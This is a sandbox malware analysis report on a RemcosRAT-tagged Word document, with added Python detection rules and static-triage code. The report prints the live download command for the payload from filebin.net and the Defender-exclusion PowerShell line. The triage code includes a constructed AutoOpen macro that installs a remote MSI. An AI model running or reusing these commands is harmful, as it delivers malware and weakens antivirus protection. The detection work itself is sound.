Windows Analysis Report
12543_0008858249_FWDOUTSTANDING_20200604.doc

Overview

General Information

Sample Name: 12543_0008858249_FWDOUTSTANDING_20200604.doc
Analysis ID: 611840
MD5: 090e1dfdcbf2185788ea14cd113cc39f
SHA1: 6346e143368edbb5a23c8eea9698be2c266311b3
SHA256: 3bd5892cdc82dc4576eaf2735edb57182ae8b91c8067be305d4e801197d390cc
Tags: doc, RemcosRAT

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Document contains OLE streams with names of living off the land binaries
Machine Learning detection for sample
Document contains OLE streams with PE executables
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Sigma detected: Cabinet File Expansion
Potential document exploit detected (performs DNS queries)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Sigma detected: Msiexec Initiated Connection
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3036 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • msiexec.exe (PID: 2996 cmdline: C:\Windows\system32\msiexec.exe /V MD5: AC2E7152124CEED36846BD1B6592A00F)
    • msiexec.exe (PID: 464 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96 MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
      • icacls.exe (PID: 1436 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
      • expand.exe (PID: 1156 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 659CED6D7BDA047BCC6048384231DB9F)
      • TRY.exe (PID: 2272 cmdline: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" MD5: 96DF7B0C491646EFC2E5F2E9F0443B8B)
        • cmd.exe (PID: 1136 cmdline: cmd /c thai.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • powershell.exe (PID: 1988 cmdline: powershell -command "Set-MpPreference -ExclusionExtension ".exe" MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • powershell.exe (PID: 2672 cmdline: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe" MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • icacls.exe (PID: 2068 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
  • rundll32.exe (PID: 2840 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup
No configs have been found
Yara matches on the submitted sample (source, rule, description, author, matched strings):

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc
Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 (author: Nils Kuhnert). Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.
Strings:
  • 0xe039:$: WindowsInstaller.Installer$
  • 0xec0b:$: CreateObject
  • 0xec36:$: InstallProduct
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc
Rule: Office_AutoOpen_Macro (author: Florian Roth). Description: Detects a Microsoft Office file that contains the AutoOpen macro function.
Strings:
  • 0xe1f3:$s1: AutoOpen
  • 0xebee:$s1: AutoOpen
  • 0xd500:$s2: Macros
Yara matches on dropped files (source, rule, description, author, matched strings):

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp
Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 (author: Nils Kuhnert). Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.
Strings:
  • 0x1039:$: WindowsInstaller.Installer$
  • 0x1f0b:$: CreateObject
  • 0x1f36:$: InstallProduct
Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP
Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 (author: Nils Kuhnert). Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts.
Strings:
  • 0x24a5:$: WindowsInstaller.Installer$
  • 0x23c6:$: CreateObject
  • 0x4b64:$: CreateObject
  • 0x4ce0:$: CreateObject
  • 0x4d1e:$: CreateObject
  • 0x5743:$: CreateObject
  • 0x4d54:$: InstallProduct
Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP
Rule: SUSP_VBA_FileSystem_Access (author: Florian Roth). Description: Detects suspicious VBA that writes to disk and is activated on document open.
Strings:
  • 0x3648:$s1: \Common Files\Microsoft Shared\
  • 0x2111:$s2: Scripting.FileSystemObject
  • 0x2470:$a3: AutoOpen
  • 0x4b36:$a3: AutoOpen
  • 0x4d30:$a3: AutoOpen
  • 0x5766:$a3: AutoOpen


Sigma matches:

Source: Process started. Author: Bhabesh Raj. Data: Command: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, CommandLine: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\expand.exe, NewProcessName: C:\Windows\SysWOW64\expand.exe, OriginalFileName: C:\Windows\SysWOW64\expand.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 464, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files, ProcessId: 1156, ProcessName: expand.exe
Source: Network Connection. Author: frack113. Data: DestinationIp: 185.47.40.36, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 2996, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
Source: Process started. Author: James Pemberton / @4A616D6573. Data: Command: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", CommandLine: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c thai.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe", ProcessId: 2672, ProcessName: powershell.exe
Source: Registry Key set. Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton. Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, ProcessId: 2272, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
Source: Process started. Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data: Command: powershell -command "Set-MpPreference -ExclusionExtension ".exe", CommandLine: powershell -command "Set-MpPreference -ExclusionExtension ".exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c thai.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1136, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Set-MpPreference -ExclusionExtension ".exe", ProcessId: 1988, ProcessName: powershell.exe
Source: Process started. Author: frack113. Data: Command: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 464, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" , ProcessId: 2272, ProcessName: TRY.exe
No Snort rule has matched
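The Sigma hits above describe the chain as individual events: msiexec.exe launching expand.exe, icacls.exe and a binary from %TEMP%, PowerShell adding a Defender exclusion and downloading an .exe, a RunOnce value pointing at advpack.dll,DelNodeRunDLL32, and Windows Installer fetching a package from filebin.net. The following is an added example, not Joe Sandbox's or the Sigma project's code: it re-implements those checks in Python over records constructed from the command lines printed in this report. The record field names, the control record for notepad.exe and the installer-host allowlist are this example's own assumptions.

```python
"""Detection logic for the msiexec-delivered chain in this report.

Added example, not Joe Sandbox's or the Sigma project's code. The event
records are constructed from the command lines printed in the Sigma hits
above; field names and the allowlist are this example's own assumptions.
"""
import ntpath
import re

# Constructed process-creation records (image, command line, parent image).
PROCESS_EVENTS = [
    {"pid": 1156, "image": r"C:\Windows\SysWOW64\expand.exe",
     "cmd": r'"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files',
     "parent": r"C:\Windows\SysWOW64\msiexec.exe"},
    {"pid": 1436, "image": r"C:\Windows\SysWOW64\icacls.exe",
     "cmd": r'"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH',
     "parent": r"C:\Windows\SysWOW64\msiexec.exe"},
    {"pid": 2272, "image": r"C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe",
     "cmd": r'"C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"',
     "parent": r"C:\Windows\SysWOW64\msiexec.exe"},
    {"pid": 1988, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -command "Set-MpPreference -ExclusionExtension ".exe"',
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"pid": 2672, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"',
     "parent": r"C:\Windows\System32\cmd.exe"},
    # Benign control record (constructed) that no rule should flag.
    {"pid": 4242, "image": r"C:\Windows\System32\notepad.exe",
     "cmd": "notepad.exe readme.txt", "parent": r"C:\Windows\explorer.exe"},
]
# Constructed registry-set record, mirroring the RunOnce hit above.
REGISTRY_EVENTS = [
    {"pid": 2272,
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0",
     "value": r'rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"'},
]
# Constructed HTTP request record, mirroring the msiexec GET above.
HTTP_EVENTS = [
    {"pid": 2996, "host": "filebin.net", "path": "/rf43v6qzghbj7h7b/TRY.msi",
     "user_agent": "Windows Installer"},
]
# Assumption: hosts from which msiexec may pull packages in this environment.
ALLOWED_INSTALLER_HOSTS = {"download.microsoft.com"}
LOLBINS = {"expand.exe", "icacls.exe", "cmd.exe", "powershell.exe"}


def _base(path):
    return ntpath.basename(path).lower()


def rule_msiexec_child(ev):
    """msiexec.exe spawning a LOLBin or a binary under %TEMP% is the custom-action stage."""
    if _base(ev["parent"]) != "msiexec.exe":
        return None
    child = _base(ev["image"])
    if child in LOLBINS or "\\appdata\\local\\temp\\" in ev["image"].lower():
        return f"msiexec_child:{child}"
    return None


def rule_defender_exclusion(ev):
    """Set-MpPreference -Exclusion* from PowerShell: flag the attempt, whether or not it succeeds."""
    if _base(ev["image"]) == "powershell.exe" and re.search(r"set-mppreference\b.*-exclusion", ev["cmd"], re.I):
        return "defender_exclusion_via_powershell"
    return None


def rule_download_to_exe(ev):
    """PowerShell web download whose output path ends in .exe."""
    if _base(ev["image"]) != "powershell.exe":
        return None
    if re.search(r"\b(invoke-webrequest|iwr|downloadfile|start-bitstransfer)\b", ev["cmd"], re.I) and \
       re.search(r"-o(utfile)?\s+\S+\.exe\b", ev["cmd"], re.I):
        return "powershell_download_to_exe"
    return None


def rule_icacls_temp_integrity(ev):
    """icacls relabelling a %TEMP% tree (this report shows HIGH, then LOW)."""
    cmd = ev["cmd"].lower()
    if _base(ev["image"]) == "icacls.exe" and "/setintegritylevel" in cmd and "\\temp\\" in cmd:
        return "icacls_integrity_level_on_temp_dir"
    return None


def rule_runonce_advpack(reg):
    """wextract-style RunOnce self-cleanup: rundll32 advpack.dll,DelNodeRunDLL32 on a temp dir."""
    if "\\currentversion\\runonce\\" in reg["key"].lower() and \
       "advpack.dll,delnoderundll32" in reg["value"].lower():
        return "runonce_advpack_delnode"
    return None


def rule_msiexec_remote_fetch(http):
    """Windows Installer user agent pulling a package from a non-allowlisted host."""
    if http["user_agent"].lower().startswith("windows installer") and \
       http["host"].lower() not in ALLOWED_INSTALLER_HOSTS:
        return f"msiexec_remote_fetch:{http['host']}"
    return None


PROCESS_RULES = (rule_msiexec_child, rule_defender_exclusion, rule_download_to_exe, rule_icacls_temp_integrity)


def detect(process_events, registry_events, http_events):
    """Return [(pid, rule_name), ...] for every record that trips a rule."""
    hits = []
    for ev in process_events:
        hits += [(ev["pid"], r) for r in (rule(ev) for rule in PROCESS_RULES) if r]
    hits += [(reg["pid"], r) for reg in registry_events if (r := rule_runonce_advpack(reg))]
    hits += [(h["pid"], r) for h in http_events if (r := rule_msiexec_remote_fetch(h))]
    return hits


if __name__ == "__main__":
    for pid, name in detect(PROCESS_EVENTS, REGISTRY_EVENTS, HTTP_EVENTS):
        print(f"PID {pid}: {name}")
```

Two points for anyone porting these to a SIEM. The Defender rule fires on the attempt, and the attempt is what matters: the console-buffer captures later in this report contain "At line:1 char:17" and "CommandNotFoundException", and column 17 is one past the sixteen-character cmdlet name Set-MpPreference, which lines up with that cmdlet not resolving on this Windows 7 analysis VM. The RunOnce rule is the noisiest of the set, because every wextract self-extractor registers the same advpack.dll,DelNodeRunDLL32 cleanup; keep it, but weight it by what wrote it (here a binary that msiexec dropped under %TEMP%).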


AV Detection

Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc. Virustotal: Detection: 37%
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc. ReversingLabs: Detection: 24%
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470. Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi. Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.exe. Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:. Avira URL Cloud: Label: malware
Source: https://filebin.net/rf43v6qzghbj7h7b/. Avira URL Cloud: Label: malware
Source: filebin.net. Virustotal: Detection: 5%
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc. Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe. Code function: 9_2_000000013FB62E28 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,GetLastError,SetCurrentDirectoryA
Source: unknown. HTTPS traffic detected: 185.47.40.36:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown. HTTPS traffic detected: 87.238.33.8:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE. File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\SysWOW64\expand.exe. File created: C:\Windows\Logs\DPX\setupact.log
Source: C:\Windows\SysWOW64\expand.exe. File created: C:\Windows\Logs\DPX\setuperr.log
Source: Binary string: wextract.pdb source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: wextract.pdbGCTL source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSI5B5A.tmp.2.dr, MSI9F1.tmp.2.dr
Source: C:\Windows\System32\msiexec.exe. File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, a: (drive-letter enumeration)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. File opened: c:
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe. Code function: 9_2_000000013FB61F00 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic. DNS query: name: filebin.net
Source: global traffic. TCP traffic: 192.168.2.22:49173 -> 185.47.40.36:443
Source: Joe Sandbox View. ASN Name: REDPILL-LINPRO (Redpill Linpro, NO)
Source: Joe Sandbox View. JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View. IP Address: 87.238.33.8
Source: Joe Sandbox View. IP Address: 185.47.40.36
Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown. Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown. Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown. Network traffic detected: HTTP traffic on port 49174 -> 443
Source: ~DFECA159C20646BB57.TMP.2.dr. String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/
Source: expand.exe, 00000007.00000003.919683562.00000000003CF000.00000004.00000800.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927628947.0000000001E20000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927698970.0000000002020000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000000.925076387.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945747952.0000000000286000.00000004.00000020.00020000.00000000.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, thai.bat.9.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr. String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.exe
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.dr. String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi
Source: ~DFECA159C20646BB57.TMP.2.dr. String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470
Source: 535fae.ipi.2.dr. String found in binary or memory: https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C:
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE. File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{02CF5D71-875F-4179-8CDC-9768D4E5C0E6}.tmp
Source: unknown. DNS traffic detected: queries for: filebin.net
Source: global traffic. HTTP traffic detected:
GET /rf43v6qzghbj7h7b/TRY.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: filebin.net
Source: global traffic. HTTP traffic detected (redirect target, pre-signed S3 URL):
GET /filebin/e76b11c6a8df860f25923a54491f9e4705e2029a6f63ff6145f41522a887dd56/e046def2a98a6096ca27aa2b595788057624cf23435c3db476f6bd4946742884?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HZXB1J7T0UN34UN512IW%2F20220420%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20220420T071855Z&X-Amz-Expires=30&X-Amz-SignedHeaders=host&response-cache-control=max-age%3D30&response-content-disposition=filename%3D%22TRY.msi%22&response-content-type=application%2Fmsword&X-Amz-Signature=88f98aff597656b73ffa540a69b51975c1f37753b3a866ffe3810b4a5c372fd1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: situla.bitbit.net

System Summary

Source: MSI5B5A.tmp.2.dr. Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480': raw dump omitted. The stream starts with a Microsoft Cabinet header (MSCF) whose member is named TRY.exe; the member is a PE image (MZ header, "This program cannot be run in DOS mode", PE signature, sections .text, .rdata, .data, .pdata, .rsrc, .reloc).
Source: MSI5B5A.tmp.2.dr. Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480': MZ signature found
Source: MSI5B5A.tmp.2.dr. Stream path '\x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479': MZ signature found
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc, type: SAMPLE. Matched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc, type: SAMPLE. Matched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects a Microsoft Office file that contains the AutoOpen macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp, type: DROPPED. Matched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, type: DROPPED. Matched rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1 date = 2022-02-26, author = Nils Kuhnert, description = Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., reference2 = https://twitter.com/threatinsight/status/1497355737844133895, reference = https://inquest.net/blog/2022/02/24/dangerously-thinbasic, tlp = white
Source: C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP, type: DROPPED. Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
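The static findings above come from two kinds of check: string rules over the document (the SUSP_Doc_WindowsInstaller_Call_Feb22_1, Office_AutoOpen_Macro and SUSP_VBA_FileSystem_Access matches, each reported as offset, identifier and string) and a container check over the dropped MSI stream (MSCF cabinet header, MZ signature). The following is an added example, not Joe Sandbox's or the rule authors' code: it re-implements both in Python, using the report's own "0x<offset>:$id: <string>" output format. The VBA text is a constructed stand-in that reproduces only the strings the rules matched (the report does not print the macro body), the compound-file blob and the MSI stream are constructed, and the "all strings must match" condition is an assumption because the rules' real conditions are not shown on this page.

```python
"""Static triage of the document and the dropped MSI stream.

Added example, not Joe Sandbox's or the YARA rule authors' code. The VBA
text and the MSI stream below are constructed stand-ins (the report prints
only the matched strings, not the macro body); the 'all strings must match'
condition is an assumption, since the rules' real conditions are not shown.
"""
import struct

# Constructed VBA text carrying the strings the rules matched (not the real macro).
VBA_SAMPLE = (
    b'Attribute VB_Name = "ThisDocument"\r\n'
    b'Sub AutoOpen()\r\n'
    b'    Dim inst As Object\r\n'
    b'    Set inst = CreateObject("WindowsInstaller.Installer")\r\n'
    b'    inst.InstallProduct "https://filebin.net/rf43v6qzghbj7h7b/TRY.msi"\r\n'
    b'End Sub\r\n'
)
# Constructed compound-file-style blob: CFB magic, a "Macros" storage name, the VBA text.
DOC_BLOB = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24 + b"Macros\x00" + VBA_SAMPLE


def build_fake_pe():
    """Minimal MZ/PE layout: e_lfanew at 0x3C points at the 'PE\\0\\0' signature."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3e)
    struct.pack_into("<I", hdr, 0x3c, 0x80)
    return bytes(hdr) + b"\x00" * (0x80 - len(hdr)) + b"PE\x00\x00" + b"\x00" * 32


# Constructed stand-in for the MSI5B5A.tmp stream: cabinet header, member name, PE image.
MSI_STREAM = b"MSCF" + b"\x00" * 32 + b"TRY.exe\x00" + build_fake_pe()

# (identifier, pattern) pairs taken from the matches printed in this report.
RULES = [
    ("SUSP_Doc_WindowsInstaller_Call_Feb22_1",
     [("$", b"WindowsInstaller.Installer"), ("$", b"CreateObject"), ("$", b"InstallProduct")]),
    ("Office_AutoOpen_Macro", [("$s1", b"AutoOpen"), ("$s2", b"Macros")]),
    ("SUSP_VBA_FileSystem_Access",
     [("$s1", b"\\Common Files\\Microsoft Shared\\"), ("$s2", b"Scripting.FileSystemObject"),
      ("$a3", b"AutoOpen")]),
]


def find_all(blob, needle):
    """Every (possibly overlapping) offset of needle in blob."""
    offsets, start = [], 0
    while (i := blob.find(needle, start)) != -1:
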